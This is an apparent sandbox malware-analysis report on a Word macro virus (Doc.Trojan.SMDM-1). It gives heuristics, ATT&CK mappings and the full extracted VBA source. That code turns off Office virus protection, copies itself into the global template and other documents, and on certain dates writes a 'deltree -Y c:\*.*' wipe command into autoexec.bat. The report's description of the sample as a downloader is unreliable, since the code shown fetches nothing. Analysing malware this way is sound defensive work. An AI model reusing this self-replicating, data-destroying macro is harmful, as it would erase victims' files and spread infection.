MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1047 WMI
T1204.002 Malicious File
The sample contains critical heuristics for VBA macros, including a Shell() call and AutoOpen macro, indicating malicious intent. The VBA script attempts to disable virus protection and execute commands, including writing to 'c:\autoexec.bat', suggesting it's a downloader for a secondary payload. The presence of legacy WordBasic markers and ClamAV detections further support its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.SMDM-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.SMDM-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1902 bytes |
SHA-256: d7b490a633956a7dcd71ae8a990fd9b287a1cd3d474802a52f2a86bd5459e78d |
|||
|
Detection
ClamAV:
Doc.Trojan.SMDM-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoExec()
CommandBars("macro").Enabled = False
CommandBars("visual basic").Enabled = False
With Options
.VirusProtection = False
End With
End Sub
Sub AutoOpen()
CommandBars("macro").Enabled = False
CommandBars("visual basic").Enabled = False
With Options
.VirusProtection = False
End With
If Day(Now()) = 5 And Month(Now()) = 3 Then MakeLove "virus"
If Day(Now()) = 5 And Month(Now()) = 6 Then MakeLove "virus"
If Day(Now()) = 5 And Month(Now()) = 9 Then MakeLove "virus"
If Day(Now()) = 5 And Month(Now()) = 12 Then MakeLove "virus"
On Error GoTo error
file$ = WordBasic.FileName$()
file_macro$ = file$ + ":Module1"
flag = WordBasic.CountMacros(0)
If flag > 0 Then
For i = 1 To flag
If WordBasic.MacroName$(i, 0) = "Module1" Then
t = 1
End If
Next i
End If
If t <> 1 Then
CopyMacro file_macro$, "Module1"
End If
t = 0
flag = WordBasic.CountMacros(1)
If flag > 0 Then
For i = 1 To flag
If WordBasic.MacroName$(i, 1) = "Module1" Then
t = 1
End If
Next i
End If
If t <> 1 Then
CopyMacro "Module1", file_macro$
ActiveDocument.SaveAs , 1
End If
error:
End Sub
Sub CopyMacro(S_M, D_M)
WordBasic.MacroCopy S_M, D_M
End Sub
Sub ToolsMacro()
Application.Visible = False
End Sub
Sub MakeLove(NoUse)
On Error GoTo Next10
Open "c:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "c:\windows\command\deltree -Y c:\*.* >#v#"
Close #1
Next10:
Rem shell("c:\windows\command\deltree -Y c:\windows\system\*.* >#v#",vbMinimizedNoFocus)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.